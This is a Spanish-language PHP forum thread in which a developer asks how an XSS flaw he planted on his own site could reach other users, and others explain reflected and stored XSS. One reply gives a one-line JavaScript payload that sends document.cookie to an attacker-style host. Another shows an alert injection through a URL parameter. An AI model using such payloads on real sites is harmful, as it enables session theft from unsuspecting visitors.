Foros del Web » Programando para Internet » PHP »

Ataque Xss

Estas en el tema de Ataque Xss en el foro de PHP en Foros del Web. Hola muchach@s... Estoy investigando sobre el tema, y tengo una sola duda... Hice que una web que tengo tenga una vulnerabilidad para XSS, ahora la ...
  #1 (permalink)  
Antiguo 03/01/2013, 00:02
Avatar de malakian  
Fecha de Ingreso: septiembre-2010
Ubicación: $malakian->Colombia();
Mensajes: 469
Antigüedad: 14 años, 2 meses
Puntos: 45
Ataque Xss

Hola muchach@s...

Estoy investigando sobre el tema, y tengo una sola duda...

Hice que una web que tengo tenga una vulnerabilidad para XSS, ahora la inyección funciona.

Mi pregunta es:

Que sentido tiene, si UNICAMENTE yo veo ese ataque, es decir, eso se está ejecutando en el cliente, pero que debilidad tiene si el ataque solo lo puede ver el mismo atacante..

No se si me hago entender... yo no me quiero poner a darmelas de "anonymous" porque no es así solo quiero entender como funciona, como puedo hacer que varias personas en diferentes equipos vean el ataque

Es que solo lo ven si me siento en el cliente...

Como funciona la denegación de servicios? con un while (1) ???

Bueno, muchas preguntas, agradezco cualquier comentario. Gracias
__________________
Guitar Loco, Desarrollador Web PHP
Sigueme: @jose1x
  #2 (permalink)  
Antiguo 03/01/2013, 00:25
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años, 7 meses
Puntos: 839
Respuesta: Ataque Xss

Cita:
Iniciado por Wikipedia
XSS es un vector de ataque que puede ser utilizado para robar información delicada, secuestrar sesiones de usuario, y comprometer el navegador, subyugando la integridad del sistema. Las vulnerabilidades XSS han existido desde los primeros días de la Web.
http://es.wikipedia.org/wiki/Cross-site_scripting

Poder explotarlo para alguno de esos propósitos depende mucho de dónde se encuentra la vulnerabilidad.
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.
  #3 (permalink)  
Antiguo 03/01/2013, 00:40
Avatar de malakian  
Fecha de Ingreso: septiembre-2010
Ubicación: $malakian->Colombia();
Mensajes: 469
Antigüedad: 14 años, 2 meses
Puntos: 45
Respuesta: Ataque Xss

Hola David, gracias por contestar.

Si, yo leí eso hace rato..

ahora, hablemos de esta vulnerabilidad en concreto

Código:
error.php?error=Usuario%20Invalido
Ataque

Código:
error.php?error=<script>alert('error')</script>
Listo se pudo hacer el ataque...

Ahora ud y yo estamos sentados en la misma sala, cada uno con su computador

como puedo atacarlo a ud desde ahí, si solo se ejecuta este tipo de ataques desde el cliente??, o debería esperar a que ud no cierre sesión??

Gracias
__________________
Guitar Loco, Desarrollador Web PHP
Sigueme: @jose1x
  #4 (permalink)  
Antiguo 03/01/2013, 01:08
Avatar de pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años, 7 meses
Puntos: 2534
Respuesta: Ataque Xss

Un ataque de XSS no es, digamos, de manera directa.

No esperarás a ejecutar instrucciones arbitrariamente en el navegador de ningún otro sólo con Javascript.

Un ejemplo sería algo así:
Cita:
((new Image()).src='http://hack-site.vc/trick.gif?s='+document.cookie)
La idea es que yo tomo tus cookies y las envío a mi sitio, de ahí a que pueda hacer algo con ellas es otra cosa, lo que debes entender es que lo único que se puede ejecutar es Javascript/HTML/CSS.

Pero para que funcione ni siquiera debemos estar conectados al mismo sitio ni nada, simplemente yo publico un tema, y también ahí coloco una imagen falsa que lo único que hace es lo de arriba, pero con sólo HTML.

¿Qué tipo de ataque te imaginabas posible?

Tampoco es la gran cosa.
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.
  #5 (permalink)  
Antiguo 03/01/2013, 02:22
Avatar de malakian  
Fecha de Ingreso: septiembre-2010
Ubicación: $malakian->Colombia();
Mensajes: 469
Antigüedad: 14 años, 2 meses
Puntos: 45
Respuesta: Ataque Xss

pateketrueke,



Imaginaba algo como, que encontraba una vulnerabilidad, colocaba un alert('hola') y que todo el mundo lo iba a ver, eso no era lo que entendía, ahora empiezo a ver la luz

muchas gracias, sigo investigando.
__________________
Guitar Loco, Desarrollador Web PHP
Sigueme: @jose1x
  #6 (permalink)  
Antiguo 03/01/2013, 09:03
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años, 7 meses
Puntos: 839
Respuesta: Ataque Xss

Cuando es indirecto, se puede dejar ese enlace en un comentario en la web, o en algún lugar que sea visible a muchas personas, tampoco es que sea demasiado difícil hacer que la gente siga un enlace.

Como dije, dependiendo de dónde está la vulnerabilidad también es posible dejar un alert('hola') o cualquier código HTML/Javascript/CSS arbitrario que sea visible a todos los visitantes de la página; como cuando un campo de un formulario para comentar no se filtra apropiadamente.
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.

Etiquetas: xss, ataques
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 18:04.